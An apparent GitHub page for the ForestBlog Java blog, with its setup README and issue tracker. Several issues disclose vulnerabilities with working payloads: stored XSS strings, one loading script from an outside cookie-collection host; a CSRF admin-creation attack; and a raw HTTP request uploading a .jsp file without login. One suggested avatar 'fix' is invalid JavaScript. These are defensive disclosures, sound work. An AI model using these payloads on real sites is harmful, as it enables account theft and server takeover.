
forestblog's Introduction

Latest news: the author has opened a Bilibili account, "Java刘哥". Follow it for free original hands-on Java courses, tutorials and tips for various frameworks, and experience from company projects.

All of the author's other blog and forum projects are listed here:

https://liuyanzhao.com/shop.html?k=博客
https://liuyanzhao.com/shop.html?k=论坛


The author offers secondary development of 风吟博客 (ForestBlog).
Completed so far, among others (contact the author if you need the source code):

  • ForestBlog + collaborative-filtering recommendations, May 2022
  • ForestBlog + WebSocket private messaging, April 2022
  • ForestBlog + ElasticSearch article search with highlighting, March 2022
  • ForestBlog converted into other blogs, forums and knowledge-sharing platforms, countless times

2022 news: SpringBoot lightweight recommendation blog https://github.com/saysky/recommendedblog
News: the SpringBoot blog SENS is now open source
News: SpringBoot/SSM/Dubbo versions of 初云博客 (Chuyun Blog), SpringBoot version
More projects and the author's paid products


About the project

This is a personal blog system built on SSM (Spring, SpringMVC, MyBatis), suitable for people who are learning SSM or want to build their own blog.
The latest version supports user registration and has two roles, user and administrator.
The author has written a graduation thesis about the project and recorded two hours of code walkthrough; contact the author on WeChat (303695336) if you need them.

Main technologies: Maven, Spring, SpringMVC, MyBatis, JSP, MySQL.
Detailed introduction: https://liuyanzhao.com/6347.html
Demo: http://forestblog.liuyanzhao.com

Paid services offered by the author

  • Remote help setting up the environment and running the project: 50
  • Project thesis: 100
  • Detailed project walkthrough, 2-3 hours: 200
  • Deployment to a cloud server: 200
  • Project and partial feature customization: from 200
  • Complete graduation project customization: 1000
  • More projects and the author's paid products

Front-end screenshot
Back-end screenshot
Back-end URL: /admin or /login

Usage notes

1. Choice of IDE

Please use IntelliJ IDEA and avoid Eclipse/MyEclipse. If the project does not start in IDEA I can help; Eclipse problems are ignored (in theory it runs there too).

2. Make sure Maven is installed

Download Maven from the official site and configure the Aliyun mirror; IDEA or Eclipse must be pointed at Maven's settings.xml.

3. Install the Lombok plugin

The code uses the @Data annotation in many places. Make sure your IDE has the Lombok plugin installed, otherwise the getter/setter methods will not be found. If Lombok does not work, the Lombok version in pom.xml is probably very different from the plugin version you installed.
Both Eclipse and IDEA need the Lombok plugin.

4. The project home page has no folder name in its path

Make sure the application context in the Tomcat configuration is / rather than /ForestBlog. This is the reason the home page shows no CSS at all: the stylesheets are referenced by absolute paths such as /xxx/xxx.css.

Setup steps

Contact me with any problem.
Simple ones I can answer directly; complex ones I can solve remotely for a fee.
QQ: 847064370
WeChat: 847064370
Online message board: https://liuyanzhao.com/message.html

1. Clone the project

Clone or download the project and unpack it. It has three parts: ForestBlog, uploads and forest_blog.sql.
ForestBlog: the complete project source. Import or open it with IDEA; make sure you import the inner ForestBlog project, i.e. the parent directory that contains pom.xml.
uploads: the directory for uploaded images. It is kept separate from the source and can be placed anywhere on disk, for example a directory on drive D; see below.
forest_blog.sql: the database dump. Create the database first, then import this file by running it as an SQL script.

2. Import the Maven project in IDEA

Make sure Maven is installed. When importing, choose an existing project of type Maven.
Wait for Maven to download the dependencies, or click refresh manually. If the download fails, check the Maven configuration, switch networks and retry a few times.
If Java classes show red errors after the import, the Lombok plugin is most likely not installed.

3. Import the database

Create a database named forest_blog and import forest_blog.sql into it. Note that the database character set and collation are utf8 and utf8_general_ci.

4. Change the database connection settings in the project

Edit db.properties, which is easy to find under src/main/resources.
It holds the MySQL settings; make sure MySQL is installed and running.
Change the database address, database name, username and password as needed,
otherwise the project will not start.

5. Configure Tomcat and the uploads directory

This is an SSM project with no main class; it has to be run under Tomcat, which is easy in both Eclipse and IDEA.
The main thing to explain here is the mapping of the upload directory.
In this project uploaded files are written to the local disk outside the project folder, i.e. the source and the upload directory are separate.
Suppose we put the uploads directory in the root of drive D (it is recommended to copy my uploads folder straight to the root of drive D). An image stored at D:/uploads/2017/10/avatar.jpg should then be reachable in the application as http://localhost:8080/uploads/2017/10/avatar.jpg. Two steps are needed:

1. Change the upload path in UploadFileController.java: set rootPath to your uploads directory, e.g. String rootPath = "D:/uploads/";
If you do not change it, uploads will fail.

2. Add a Tomcat mapping for uploads.

  • In IDEA:
    Add it under Deployment in the Tomcat run configuration, as shown in the screenshots.

  • In Eclipse:
    In Server/server.xml, add the following inside the Host element:

<Context path="/" docBase="project path, no change needed" debug="0" reloadable="true" />
<Context path="/uploads" docBase="D:/uploads/" debug="0" reloadable="true" />
  • Linux server deployment

Add the following inside the Host element of tomcat/conf/server.xml:

<Context path="/" docBase="project path, e.g. /www/server/tomcat/webapps/ForestBlog" debug="0" reloadable="true" />
<Context path="/uploads" docBase="/www/uploads" debug="0" reloadable="true" />

If this is not configured, images in uploads will not load and the uploaded pictures will not be displayed.
Note that a directory mapped as a Tomcat Context is served like a web application: with Tomcat's default JSP servlet mapping, a .jsp file written into uploads is compiled and executed when requested, which is why the upload filtering discussed in the issues below matters.

Download

GitHub: https://github.com/saysky/ForestBlog (a Star and a Fork would be appreciated)

Changelog

  • 2021-02-25

  • Third major update: fixed some bugs, added user registration and user management

  • 2018-11-26

  • Second major update: cleaned up the code and improved the comments

  • 2017-10-10

  • First complete commit

Buy me a milk tea

Buy me a milk tea! A quick ad: the author has some free time and takes on graduation project customization, custom software and Java problem solving on an ongoing basis.
See the paid services above for details.
The author's paid products: https://liuyanzhao.com/shop.html

forestblog's People

Contributors

saysky

forestblog's Issues

ForestBlog has a front-end stored XSS vulnerability that can obtain the account passwords of all users, including administrators

First open the registration page and use arbitrary JavaScript as the nickname. Here I use <script>alert(document.cookie)</script> as an example to read the cookie; a real exploit would send the contents of document.cookie to the attacker's remote server with an HTTP request. Because the cookie contains the username and password, a successful XSS attack gives the attacker the user's or administrator's account password.
After registering, open any article and post any comment.
At this point the XSS is triggered in the following situations:
1. The admin interface shows recent comments, so the XSS fires as soon as the administrator logs in to the back end.
2. The blog home page also shows recent comments, so the XSS fires as soon as any user or administrator visits the home page.
3. The attacker commented under the article, so opening that article also fires the XSS.
So the vulnerability is very harmful, its scope is very wide and it is very easy to exploit. Besides harvesting the cookies of all users and administrators, since the attacker controls the JavaScript, malicious redirects and other attacks on the integrity of the site are possible too.
Suggested fixes:
1. Introduce a CSP policy to restrict script loading (recommended: there have been many XSS reports before, fixing them one at a time is tedious and there may be unknown XSS elsewhere; with CSP introduced and configured correctly all XSS can be prevented). The second-best option is to HTML-entity-encode user input when it is output.
2. Do not store the account password in plaintext in the cookie.
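The second fix suggested above, as an added example that is not part of the issue or of ForestBlog's code: a remember-me cookie that carries a signed user id and expiry instead of the username and password. The cookie name, the field layout and the in-memory server secret are assumptions for the example; the token is verified with an HMAC over the bytes exactly as received and compared in constant time, and the cookie attributes keep document.cookie from reading it.

```python
import base64
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Assumption: a 32-byte key loaded from server configuration. It must never be
# sent to the client; a fresh random key here only lets the example run alone.
SERVER_SECRET = secrets.token_bytes(32)
COOKIE_NAME = "remember_me"  # hypothetical cookie name


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(user_id: int, ttl_seconds: int, now: Optional[float] = None) -> str:
    """Return 'user_id.expiry.mac'. The MAC covers both fields, so neither the
    user id nor the expiry can be altered without the server secret, and the
    password is not in the cookie at all."""
    exp = int((time.time() if now is None else now) + ttl_seconds)
    payload = f"{user_id}.{exp}".encode()
    mac = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    return f"{payload.decode()}.{_b64(mac)}"


def verify_token(token: str, now: Optional[float] = None) -> Optional[int]:
    """Return the user id if the token is authentic and unexpired, else None.
    The MAC is checked over the text exactly as received, in constant time,
    before the fields are interpreted at all."""
    try:
        user_part, exp_part, mac_part = token.split(".")
        given_mac = _unb64(mac_part)
    except (ValueError, TypeError):
        return None
    payload = f"{user_part}.{exp_part}".encode()
    expected = hmac.new(SERVER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(given_mac, expected):
        return None
    try:
        user_id, exp = int(user_part), int(exp_part)
    except ValueError:
        return None
    if (time.time() if now is None else now) >= exp:
        return None
    return user_id


def set_cookie_header(token: str, max_age: int) -> str:
    """Value for a Set-Cookie header. HttpOnly keeps document.cookie (and so
    the XSS in this issue) from reading it, Secure limits it to HTTPS and
    SameSite=Lax stops most cross-site requests from carrying it."""
    return (f"{COOKIE_NAME}={token}; Max-Age={max_age}; Path=/; "
            "HttpOnly; Secure; SameSite=Lax")


if __name__ == "__main__":
    t0 = 1_700_000_000
    tok = issue_token(42, 3600, now=t0)
    print(set_cookie_header(tok, 3600))
    print("valid:", verify_token(tok, now=t0 + 10))
    # Rewriting the user id to 1 (an admin, say) breaks the MAC.
    print("tampered:", verify_token("1." + tok.split(".", 1)[1], now=t0 + 10))
    print("expired:", verify_token(tok, now=t0 + 3600))
```

Even with this cookie, the session itself still has to be invalidated server-side on logout or password change; the token only replaces the plaintext credentials that the issue shows in the cookie.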

There is a stored XSS vulnerability

Bug Report

I found stored XSS vulnerabilities all over the website.
I ran the project in my environment with Tomcat.
In article comment editing I inserted an XSS payload for my test.
payload: <img src=x onerror=alert(1) />
We can see the JavaScript payload is effective.
Then I tested the name input; it also has the problem.

When the admin user logs in to the site's back end, it also fires there.

pom.xml has two JUnit dependencies

The Maven archetype generated a junit 3.8.1 dependency and I also added junit 4.1.2 myself. The redundant one can be removed.

Fix for a bug where the avatar is not displayed after changing it in the back end

Thanks to the author for the generous contribution; this is a very good project for learning the SSM framework. Let me add my own small contribution:

In Admin/User/edit.jsp, line 127:

$("#userAvatar").attr("value", res.data.src);

add the following line below it:

${userCustom.userAvatar} = res.data.src;

Tested and working.

Optimise the indexes on article

Problem

The article table is missing some needed indexes. In our tests, adding them greatly improves the performance of the related queries (by up to 80%). The indexes to add are:

1. article.article_user_id

ArticleMapper#countByUser counts a user's articles by user id and is a fairly common query; an index on article_user_id speeds it up.

2. article.article_update_time

ArticleMapper#getLastUpdateArticle fetches the most recently updated articles and is a common query; an index on the update_time column improves its performance considerably.

3. article.(article_order, article_id)

ArticleMapper#findAll selects all columns of article by condition and is a fairly common query; its result is sorted by article_order and article_id, so a composite index on these two columns greatly improves its efficiency.

4. article.article_title (FULLTEXT)

The conditions of ArticleMapper#findAll often include a keyword that is matched against article_title. Matching articles by keyword is very common in practice, so a full-text index should be added on article_title to speed up these queries.

Solution

Add indexes on the following columns
article.article_user_id
article_update_time
article_title
article.(article_order, article_id)

Add an index on article_category_ref to accelerate queries

article_category_ref is the association table between article and category, but it has neither a primary key (on both columns) nor a secondary index (on either of the two columns), which may hurt performance when the table is large.

There is a CSRF vulnerability

CSRF vulnerability

With this vulnerability, if the admin user clicks a phishing link provided by the attacker, it creates a new user that can log in to the website management back end.

I reviewed the code in the project and found that the code where the admin adds other users has no protection against cross-site request forgery.

So I used Burp to generate the CSRF PoC.

Then, if the admin clicks the button (some CSRF link), it creates a new user admin2 on the website.
admin2 can log in to the website back end.

With further testing, this vulnerability can also be used to delete users on the website.
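The protection the issue says is missing, as an added example (not ForestBlog's code): the synchronizer-token pattern for the admin "add user" request. The form field name, the endpoint path and the session and user dictionaries are assumptions. The browser attaches the session cookie to a forged cross-site POST just as it does to a legitimate one, so the role check alone does not help; what rejects the forged request is a per-session random token that only the page rendered by the site contains and that another origin cannot read.

```python
import hmac
import secrets
from typing import Dict

CSRF_FIELD = "_csrf"                 # hypothetical form field name
ADD_USER_ACTION = "/admin/user/add"  # hypothetical endpoint path


def get_or_create_csrf_token(session: Dict[str, str]) -> str:
    """Per-session random token, stored only server-side and in the page we
    render; it is never derived from anything an attacker could guess."""
    token = session.get(CSRF_FIELD)
    if token is None:
        token = secrets.token_urlsafe(32)
        session[CSRF_FIELD] = token
    return token


def csrf_token_is_valid(session: Dict[str, str], form: Dict[str, str]) -> bool:
    expected = session.get(CSRF_FIELD)
    given = form.get(CSRF_FIELD)
    if not expected or not given:
        return False
    return hmac.compare_digest(expected, given)


def render_add_user_form(session: Dict[str, str]) -> str:
    """The admin page embeds the token as a hidden field; this rendered page
    is the only place the token is exposed."""
    token = get_or_create_csrf_token(session)
    return (
        f'<form method="post" action="{ADD_USER_ACTION}">'
        f'<input type="hidden" name="{CSRF_FIELD}" value="{token}">'
        '<input name="username"><input name="password" type="password">'
        '<button>Add</button></form>'
    )


def handle_add_user(session: Dict[str, str], form: Dict[str, str],
                    users: Dict[str, dict]) -> Dict[str, object]:
    """Admin 'add user' handler: authorise, then check the token, then act.
    The same token check belongs on every state-changing handler, including
    the delete-user one the issue mentions."""
    if session.get("role") != "admin":
        return {"status": 403, "error": "admin only"}
    if not csrf_token_is_valid(session, form):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    name = form.get("username", "").strip()
    if not name or name in users:
        return {"status": 400, "error": "bad or duplicate username"}
    users[name] = {"role": form.get("role", "user")}
    return {"status": 200, "created": name}


if __name__ == "__main__":
    admin_session = {"role": "admin"}
    users: Dict[str, dict] = {}
    render_add_user_form(admin_session)
    token = admin_session[CSRF_FIELD]
    # Submission from the rendered page carries the token and succeeds.
    print(handle_add_user(admin_session, {"username": "alice", CSRF_FIELD: token}, users))
    # Forged form on the attacker's site: same session cookie, no usable token.
    print(handle_add_user(admin_session, {"username": "admin2", "password": "x"}, users))
```

Setting SameSite=Lax on the session cookie is a useful second layer, but the token check is the one that does not depend on browser behaviour.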

Why does it return 404?

HTTP Status 404 - /ForestBlog/

type Status report

message /ForestBlog/

description The requested resource is not available.

Apache Tomcat/7.0.64

One or more listeners failed to start

org.apache.catalina.core.StandardContext.startInternal One or more listeners failed to start. Full details will be found in the appropriate container log file
01-Mar-2021 02:26:56.896 SEVERE [RMI TCP Connection(2)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal Context [] startup failed due to previous errors

Does anyone know why this happens? I tried the solutions from Baidu and they did not work either.

File upload bypass exists

In this code, the suffix check should verify the file type after the last dot:
public final String allowSuffix = ".bmp.jpg.jpeg.png.gif.pdf.doc.zip.rar.gz";

/**
 * Upload a file
 *
 * @param file
 * @return
 * @throws IOException
 */
@RequestMapping(value = "/img", method = RequestMethod.POST)
public JsonResult uploadFile(@RequestParam("file") MultipartFile file) {

    // 1. Filter by file suffix; only some suffixes are allowed
    // Full file name, e.g. spring.jpeg
    String filename = file.getOriginalFilename();
    // Base name, e.g. spring
    String name = filename.substring(0, filename.indexOf("."));
    // File suffix, e.g. .jpeg
    String suffix = filename.substring(filename.lastIndexOf("."));

    if (allowSuffix.indexOf(suffix) == -1) {
        return new JsonResult().fail("Files with this suffix are not allowed!");
    }

example: (screenshots)

Problem with the user table

MySQL has a user table by default; the user table in this script will overwrite MySQL's built-in one and cause permission problems. Please rename the table.

XSS vulnerability

Version: current
In the comment section of an article, when the user is not logged in, the comment form requires a nickname, email address and website address. The vulnerable URL is http://ip:port/comment
After filling in the parameters, capture the request with Burp Suite and change the value of the commentauthoremail parameter to < script /SRC=//xsshs.cn/h2X3 >. document.cookie cannot be used directly here to get the user's cookie.
When the back-end user clicks the comment to edit it and saves, the XSS is triggered. The vulnerable URL is http://ip:port//admin/comment/editSubmit
The XSS platform received the cookie of the back-end user.

The source code that triggers the vulnerability is \ForestBlog\src\main\java\com\liuyanzhao\ssm\blog\controller\admin\BackCommentController.java, line 110.

XSS attack when the user profile picture is updated

1. Edit user information and save it.
2. Change the profile picture address in the captured request.
payload: 1" onerror=alert('xss') class="1
3. Anywhere the user's avatar is loaded triggers cross-site scripting.
4. XSS checks should be added when user information is added or modified:
src/main/java/com/liuyanzhao/ssm/blog/controller/admin/AdminController.java

Change the storage engine of some tables to speed up full-table row counts

Problem

The following three paginated queries produce a statement that counts all rows of a table:

1. CommentServiceImpl#listCommentByPage

SELECT count(0) FROM comment

2. CategoryController#getArticleListByCategory

SELECT COUNT(*) FROM category

3. TagController#getArticleListByTag

SELECT COUNT(*) FROM tag

InnoDB does not cache table metadata, so executing such statements is relatively expensive, whereas MyISAM keeps the table metadata cached and can return the row count almost instantly. If there is no other reason that requires InnoDB, I suggest changing the storage engine of these tables to optimise this kind of statement.
Reference: https://dev.mysql.com/doc/refman/8.0/en/group-by-functions.html#function_count

Solution

Change the storage engine of the comment, category and tag tables to MyISAM

ForestBlog Existing XSS

Vulnerability product: ForestBlog
Vulnerability version: all
Vulnerability type: Stored XSS
Vulnerability details:

<script>alert(document.cookie)</script>

The stored XSS payload can cause the admin to disclose cookies, the website root path, PHP variables and so on.

  1. Login link: http://forestblog.liuyanzhao.com/login
    I registered my own account here
    Account: linkk
    Password: linkk

  2. When writing the article title or content, enter <script>alert(document.cookie)</script>
    Click publish

  3. Click the article on the home page to view it

Found that the XSS was triggered

Optimise the indexes on comment

Problem

The comment table is missing some needed indexes. In our tests, adding them greatly improves the performance of the related queries (by up to 80%). The indexes to add are:

1. comment.comment_article_id

CommentMapper#listCommentByArticleId looks up the comments of an article, undoubtedly one of the more frequent comment-related queries; to make it efficient an index should be added on the article_id column.

2. comment.comment_pid

CommentMapper#listChildComment fetches the child comments of a comment, also a fairly common query, so an index on comment_pid is worthwhile to speed it up.

Solution

Add indexes on the following columns
comment.comment_article_id
comment.comment_pid

Artifact ForestBlog:war: Error during artifact deployment. See server log for details.

  • Environment
24-Feb-2018 17:05:22.430 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server version:        Apache Tomcat/8.5.28
24-Feb-2018 17:05:22.435 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server built:          Feb 6 2018 23:10:25 UTC
24-Feb-2018 17:05:22.435 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server number:         8.5.28.0
24-Feb-2018 17:05:22.435 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Name:               Windows 10
24-Feb-2018 17:05:22.435 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Version:            10.0
24-Feb-2018 17:05:22.435 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Architecture:          amd64
24-Feb-2018 17:05:22.436 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Java Home:             C:\Program Files\Java\jdk1.8.0_161\jre
24-Feb-2018 17:05:22.436 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Version:           1.8.0_161-b12
24-Feb-2018 17:05:22.436 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Vendor:            Oracle Corporation
24-Feb-2018 17:05:22.436 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE:         C:\Users\Avalon\.IntelliJIdea2017.3\system\tomcat\Unnamed_ForestBlog_2
24-Feb-2018 17:05:22.436 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME:         C:\apache-tomcat-8.5.28
  • Partial error log
Connected to server
[2018-02-24 05:05:24,164] Artifact ForestBlog:war: Artifact is being deployed, please wait...
24-Feb-2018 17:05:33.842 INFO [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Deploying web application directory [C:\apache-tomcat-8.5.28\webapps\manager]
24-Feb-2018 17:05:34.421 INFO [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Deployment of web application directory [C:\apache-tomcat-8.5.28\webapps\manager] has finished in [578] ms
24-Feb-2018 17:05:40.018 INFO [RMI TCP Connection(3)-127.0.0.1] org.apache.jasper.servlet.TldScanner.scanJars At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
log4j:WARN No appenders could be found for logger (org.springframework.web.context.ContextLoader).
log4j:WARN Please initialize the log4j system properly.
log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info.
24-Feb-2018 17:05:40.582 SEVERE [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal One or more listeners failed to start. Full details will be found in the appropriate container log file
24-Feb-2018 17:05:40.583 SEVERE [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal Context [] startup failed due to previous errors
[2018-02-24 05:05:40,759] Artifact ForestBlog:war: Error during artifact deployment. See server log for details.

I do not know yet where the problem is; I would appreciate some guidance.

Clicking "Basic profile" under the back-end avatar gives 404

Clicking "Basic profile" under the avatar in the back end returns 404, because in the code admin/profile no longer needs the userId appended to the link. Just fix the hyperlink. Please fix it, thanks!

Fetching random articles with ORDER BY RAND() gives poor performance

ArticleMapper::listRandomArticle

SELECT
<include refid="Base_Column_List"/>
FROM
<include refid="tb"/>
WHERE article_status = 1
ORDER BY
RAND()
limit #{limit}

uses ORDER BY RAND() to pick random rows. When the article table is large this performs badly, because it does a full table scan followed by a filesort.

A possible optimisation is described in this Stack Overflow answer.

It will not start

7-Nov-2019 21:01:56.241 WARNING [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.util.SessionIdGeneratorBase.createSecureRandom Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [227] milliseconds.
17-Nov-2019 21:01:56.243 SEVERE [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal Context [] startup failed due to previous errors
17-Nov-2019 21:01:56.246 INFO [Catalina-utility-2] org.apache.catalina.startup.HostConfig.deployDirectory Deploying web application directory [D:\apache-tomcat-9.0.26\webapps\manager]
17-Nov-2019 21:01:56.275 WARNING [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.loader.WebappClassLoaderBase.clearReferencesJdbc The web application [ROOT] registered the JDBC driver [com.alibaba.druid.proxy.DruidDriver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.
17-Nov-2019 21:01:56.275 WARNING [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.loader.WebappClassLoaderBase.clearReferencesJdbc The web application [ROOT] registered the JDBC driver [com.mysql.cj.jdbc.Driver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.
[2019-11-17 09:01:56,307] Artifact ForestBlog:war exploded: Error during artifact deployment. See server log for details.
17-Nov-2019 21:01:56.371 INFO [Catalina-utility-2] org.apache.catalina.startup.HostConfig.deployDirectory Deployment of web application directory [D:\apache-tomcat-9.0.26\webapps\manager] has finished in [124] ms
[2019-11-17 09:01:56,400] Artifact uploads: Artifact is deployed successfully
[2019-11-17 09:01:56,401] Artifact uploads: Deploy took 9,903 milliseconds
17-Nov-2019 21:02:00.273 信息 [Abandoned connection cleanup thread] org.apache.catalina.loader.WebappClassLoaderBase.checkStateForResourceLoading Illegal access: this web application instance has been stopped already. Could not load []. The following stack trace is thrown for debugging purposes as well as to attempt to terminate the thread which caused the illegal access.
java.lang.IllegalStateException: Illegal access: this web application instance has been stopped already. Could not load []. The following stack trace is thrown for debugging purposes as well as to attempt to terminate the thread which caused the illegal access.
at org.apache.catalina.loader.WebappClassLoaderBase.checkStateForResourceLoading(WebappClassLoaderBase.java:1385)
at org.apache.catalina.loader.WebappClassLoaderBase.getResource(WebappClassLoaderBase.java:1038)
at com.mysql.cj.jdbc.AbandonedConnectionCleanupThread.checkContextClassLoaders(AbandonedConnectionCleanupThread.java:96)
at com.mysql.cj.jdbc.AbandonedConnectionCleanupThread.run(AbandonedConnectionCleanupThread.java:69)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:834)
Please help.

The uploads folder is incomplete; some images are missing

After several days of debugging I finally got it working, thanks. But I found that the uploads/2018 folder is missing some subfolders, such as 07, so some images are missing. Could you upload the complete folder? Thanks.

Data not kept in sync

After deleting all articles in the back end, the category still shows an article count, so the category cannot be deleted.

With a newer MySQL version the driver is too old and throws an error

MySQL version:
select version();
+-----------+
| version() |
+-----------+
| 8.0.12 |
+-----------+
1 row in set (0.00 sec)

Under MySQL 8.0.12 the following error occurs:

2019-08-29 11:49:09,338 ERROR [com.alibaba.druid.pool.DruidDataSource] - init datasource error, url: jdbc:mysql://localhost:3306/forest_blog?useUnicode=true&characterEncoding=UTF-8&useSSL=false&serverTimezone=UTC
java.sql.SQLException: Could not retrieve transation read-only status server

Caused by: java.sql.SQLException: Could not retrieve transation read-only status server

Replace two jars:

  1. spring-jdbc
    Comment out the original:
        <!--<groupId>org.springframework</groupId>-->
        <!--<artifactId>spring-jdbc</artifactId>-->
        <!--<version>4.2.0.RELEASE</version>-->

Add the new version:

        <groupId>org.springframework</groupId>
        <artifactId>spring-jdbc</artifactId>
        <version>5.1.9.RELEASE</version>

  2. mysql-connector-java
    Comment out the original:
        <!--<groupId>mysql</groupId>-->
        <!--<artifactId>mysql-connector-java</artifactId>-->
        <!--<version>5.1.30</version>-->

Add the new version:

        <groupId>mysql</groupId>
        <artifactId>mysql-connector-java</artifactId>
        <version>8.0.17</version>

EL Syntax Error

Description Resource Path Location Type
EL Syntax Error articleListByCategory.jsp /ForestBlog/src/main/webapp/WEB-INF/view/Home/Page line 0 JSP Problem

Optimise the indexes on article_tag_ref

Problem

The article_tag_ref table is missing some needed indexes. In our tests, adding them greatly improves the performance of the related queries (by up to 80%). The indexes to add are:

1. article_tag_ref.tag_id

ArticleTagRefMapper#countArticleByTagId counts records by tag_id, and ArticleMapper#findAll contains a subquery that looks up the related article_id values by tag_id, so tag_id should get its own index to speed up these queries.

Solution

Add indexes on the following columns
article_tag_ref.tag_id

XSS vulnerability exists

There is no character validation for the nickname on the registration page.
When the administrator clicks the user management function, the XSS alert box pops up.

Some XSS problems

There is a reflected XSS in the front-end search.
The front end has a comment-posting endpoint.

The code that receives the IP: (screenshot)

It is filtered with the escape method of cn.hutool.http.HtmlUtil, whose rules are: (screenshot)

If the URL appears inside the href attribute of an a tag, can't a pseudo-protocol be written there for XSS?

Go to the back-end home page and click this nickname,

and the XSS is triggered successfully.

On the comment management list page it is triggered directly, because the IP information is displayed.

The back-end article editor has an upload feature.

A file name containing XSS code can also be uploaded, for example as .png, and the upload succeeds, but this feature is only available in the back end.

The front end also has a friend-link application form.
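The output side of the fixes proposed across the XSS issues above (entity-encoding user input on output, plus the href pseudo-protocol point raised in this last issue), as an added example that is not part of any issue or of ForestBlog's code. The inputs in the demo are the payloads quoted in the issues; the rendering function, the CSP string and the scheme allow-list are assumptions for the example. The point it shows is that one encoder is not enough: text and attribute contexts need entity encoding, but a URL that lands in href or src needs a scheme check, because `javascript:alert(1)` contains nothing that entity encoding changes.

```python
import html
from urllib.parse import urlsplit

SAFE_URL_SCHEMES = {"http", "https"}
# Characters browsers discard when parsing a URL: leading/trailing C0 controls
# and space, plus tab/LF/CR anywhere. Remove them before looking at the scheme,
# or "java\nscript:" would look like a relative path here and be reassembled
# into javascript: by the browser.
_STRIP = "".join(chr(c) for c in range(0x21))

# Assumed policy: refuses inline script, which covers both <script> blocks and
# onerror= handlers wherever an encoding call was forgotten. The site's own
# inline scripts then have to move into files served from the same origin.
CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"


def encode_text(value: str) -> str:
    """For text between tags: once < is &lt;, <script> cannot open a tag."""
    return html.escape(value, quote=False)


def encode_attr(value: str) -> str:
    """For a double-quoted attribute value: the quote that would close the
    attribute in 1" onerror=... becomes &quot;, so no new attribute starts."""
    return html.escape(value, quote=True)


def safe_url(value: str) -> str:
    """For href/src. Entity-encoding leaves javascript:alert(1) intact, so the
    scheme is checked against an allow-list; relative paths such as
    /uploads/... pass, protocol-relative //host and other schemes do not."""
    v = "".join(ch for ch in value if ch not in "\t\n\r").strip(_STRIP)
    if not v or v.startswith("//"):
        return "#"
    scheme = urlsplit(v).scheme.lower()
    if scheme == "" or scheme in SAFE_URL_SCHEMES:
        return encode_attr(v)
    return "#"


def render_comment(author: str, website: str, avatar: str, body: str) -> str:
    """Each value goes through the encoder for the context it lands in."""
    return (
        '<div class="comment">'
        f'<img src="{safe_url(avatar)}" alt="{encode_attr(author)}">'
        f'<a href="{safe_url(website)}" rel="nofollow">{encode_text(author)}</a>'
        f'<p>{encode_text(body)}</p></div>'
    )


if __name__ == "__main__":
    # Payloads quoted in the issues; the rest of the comment is constructed.
    print(render_comment(
        author="<script>alert(document.cookie)</script>",
        website="javascript:alert(1)",
        avatar='1" onerror=alert(\'xss\') class="1',
        body="<img src=x onerror=alert(1) />",
    ))
```

Encoding at output time rather than filtering at input time is what makes this hold for every place a value is later displayed, including the admin comment list and the recent-comments widgets the issues describe; the CSP header is the backstop for the place that was missed.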

There is an arbitrary file upload vulnerability

The back end of your website allows arbitrary file upload: you can upload any file, such as .jsp and .html. And this API does not require the user to be logged in, so a file uploaded here can directly get a shell and take over the web server.

example:
Upload a picture:

Look at this endpoint's source code (/src/main/java/com/liuyanzhao/blog/controller/common/UploadFileController.java):
You know, there are two problems.
(1) No login is required.
(2) Any file can be uploaded through this endpoint.

Choose a picture to upload, delete the Cookie, and change the suffix to .jsp, .html, etc.

POST /uploadFile HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/admin/article/edit/38
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------895687275210314910246127694
Content-Length: 6887
DNT: 1
Connection: close
Cookie: JSESSIONID=; viewId=36; username=; password=

-----------------------------895687275210314910246127694
Content-Disposition: form-data; name="file"; filename="21.jsp"
Content-Type: image/png

<%out.println(1);%>
-----------------------------895687275210314910246127694--

We can visit it directly.

I think you should restrict the type of files that can be uploaded.
